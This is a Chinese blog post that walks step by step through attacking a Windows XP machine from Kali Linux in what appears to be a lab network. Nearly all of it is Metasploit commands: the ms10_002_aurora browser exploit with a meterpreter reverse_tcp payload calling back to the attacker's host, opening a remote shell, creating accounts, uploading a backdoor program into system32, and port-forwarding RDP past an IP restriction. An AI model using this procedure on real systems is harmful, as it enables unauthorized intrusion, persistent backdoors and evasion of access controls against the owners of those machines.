证网络连通性,配置网络地址

kali之***XP系统1

第一次使用msfconsole,开启内建的数据库PostgreSQL和metasplote
开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start
 
[email protected]:~# msfconsole

kali之***XP系统1

查找10-002漏洞模块 search 10-002

kali之***XP系统1

use exploit/windows/browser/ms10_002_aurora 进行漏洞***

set payload windows/meterpreter/reverse_tcp 定义***载荷
set lhost 192.168.48.123 定义本机地址
set URIPATH / 定义url的后缀(这里我只设置了一个/)
exploit 开发

kali之***XP系统1

在***主机打开目标网站http://192.168.48.123:8080/

kali之***XP系统1

sessions -i 1 打开连接会话

session 查看已经成功获取的会话,使用session -i 连接到指定序号的meterpreter会话已继续利用

通过shell 获取目标主机的远程命令行

通过DOS创建账号与密码

kali之***XP系统1

远程连接该系统

rdesktop  -u  administrator  -p  123  192.168.48.100:3389

kali之***XP系统1

getuid查看meterpreter注入到目标主机的进程所属用户
upload命令上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload  setup.exe  C:\\windows\\system32\
portfwd 端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,***主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd  add -l  1122 -p 3389 -r  192.168.48.100
把目标主机192.168.48.100的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rdesktop  -u  administrator  -p  123456  192.168.48.100:1122
sysinfo查看目标主机系统信息
ps 查看目标主机上运行的进程信息,结合migrate使用

本文出自 “马广杰——博客” 博客,转载请与作者联系!